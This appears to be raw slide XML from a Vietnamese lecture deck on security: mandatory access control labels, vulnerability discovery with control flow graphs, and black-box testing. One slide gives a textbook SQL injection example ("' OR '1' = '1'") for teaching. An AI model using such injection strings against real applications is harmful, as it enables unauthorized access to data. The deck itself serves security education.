            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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xmlns="" id="{BB1CE218-775F-DAB4-EB46-7E4BF0C3B118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3237517"/>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6A59A33F-EEF6-95EA-06ED-11F8191D6F66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273176" y="3888719"/>
            <a:ext cx="9736403" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>MAC bảo mật thông tin bằng cách </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="0" i="0" u="sng">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gán nhãn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> độ nhạy trên thông tin và so sánh điều này với mức độ nhạy cảm mà người dùng đang thao tác.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300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xmlns="" id="{C9BE7266-53F9-A626-1D4B-17B0A83422AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1282212" y="5491161"/>
            <a:ext cx="9650717" cy="2400657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="30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30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3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dữ liệu “tuyệt mật” được cung cấp cho một nhóm người dựa trên mức độ để truy cập các tài liệu “tuyệt mật” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>có quyền truy cập vào thông tin ở cấp độ thấp hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hưng những nhân viên </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>có </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>quyền thấp hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> sẽ không có quyền truy cập vào thông tin được phân loại ở </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cấp độ cao hơn.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000"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6ADC9688-FF9B-5333-9B44-189C6DD89166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11209300" y="3560028"/>
            <a:ext cx="6158694" cy="5276928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{39A3D23C-01BC-602C-3D0B-8AA8E9F163DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7713968" y="9089676"/>
            <a:ext cx="8275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13</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3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6B1092F5-45F0-04F7-D212-895FAF170E95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13480317" y="8919412"/>
            <a:ext cx="1794103" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Mô hình MAC</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36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6D278905-418D-3162-1EBE-51A900D3E923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769157" y="461161"/>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3356EC57-1CA7-E828-AC9B-6CC5C63E3075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="812115" y="2247900"/>
            <a:ext cx="16802100" cy="7772400"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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8E4242AE-E8EA-82B1-F124-DE6DC72B53C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172065" y="2350463"/>
            <a:ext cx="9863328"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5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tiếp cận các lỗ hổng bảo mật</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B1CE218-775F-DAB4-EB46-7E4BF0C3B118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231217" y="3049775"/>
            <a:ext cx="4404280" cy="830997"/>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Bằng cách phân tích mã nguồn tĩnh và động </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6A59A33F-EEF6-95EA-06ED-11F8191D6F66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231217" y="4241588"/>
            <a:ext cx="10827495" cy="4464043"/>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Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mã nguồn của một ứng dụng có thể được phân tích theo cách để tìm một tập dữ liệu mà việc thực thi chương trình có thể đến một nút cụ thể, được gọi là nút đích trong Biểu đồ luồng điều khiển (CFG), đại diện cho mục tiêu của phân tích thử nghiệm. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18"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Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Đây là cách tiếp cận chuỗi. Cách tiếp cận chuỗi bảo mật sẽ dẫn đến việc tạo ra chỉ những chuỗi sự kiện cần được thực thi để phát hiện các lỗ hổng bảo mật. Nếu cách tiếp cận không thể tìm ra giải pháp để đi qua cây, thì cây này được coi là không thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="26035" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="25"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="The Serif Hand Light" panose="020F0502020204030204" pitchFamily="66" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CFG rất hữu ích trong việc phân tích mã nguồn của chương trình vì nó cho phép các nhà phân tích hiểu được cách mà chương trình sẽ thực hiện trong các tình huống khác nhau và xác định các vấn đề như </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400" u="sng">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>lỗi logic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400" u="sng">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>lỗi tràn bộ nhớ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, hoặc các lỗ hổng bảo mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> khác,…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:effectLst/>
              <a:latin typeface="The Serif Hand Light" panose="020F0502020204030204" pitchFamily="66" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{39A3D23C-01BC-602C-3D0B-8AA8E9F163DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7740740" y="9478632"/>
            <a:ext cx="8275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14</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9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{82F28D06-B9EB-D7D2-A406-48ED32F7501F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705599" y="3049775"/>
            <a:ext cx="5201015" cy="830997"/>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Xử lý hệ thống kiểm tra như kiểm thử hộp đen</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xmlns="" id="{D4229736-AD2E-DCBC-6C33-64415C96D155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12643467" y="2378629"/>
            <a:ext cx="4472468" cy="7096317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{45DA98EE-8966-6304-F14E-AD53BE383CA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13036792" y="9474946"/>
            <a:ext cx="3710345" cy="423834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="26035" indent="238125" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="25"/>
              </a:spcAft>
            </a:pP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 đồ luồng điều khiển [13]</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xmlns="" id="{461C4CEB-F9BB-A462-0569-FE433A966C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="2968968"/>
            <a:ext cx="0" cy="9118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1120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xmlns=""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001FB2E2-B909-6B21-5EED-C00C0969E8A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128929" y="2916699"/>
            <a:ext cx="12282271" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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63E0BBCF-A306-7FDE-F88B-4840AFC94A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122751" y="3568255"/>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4488A448-F015-0709-F115-469AE326846F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128929" y="4770027"/>
            <a:ext cx="8679741" cy="2631490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Đầu vào được gán cho </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>các </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>biến input1 và input2 và nội dung của biến đó sẽ được sử dụng để tự động tạo truy vấn câu lệnh SQL như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> sau:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>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SELECT * FROM tbl_user WHERE username =  ' ' OR '1' = '1’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5AC02664-C891-F556-7420-8C9AECC6170F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9945269" y="3591939"/>
            <a:ext cx="7751273" cy="5055249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
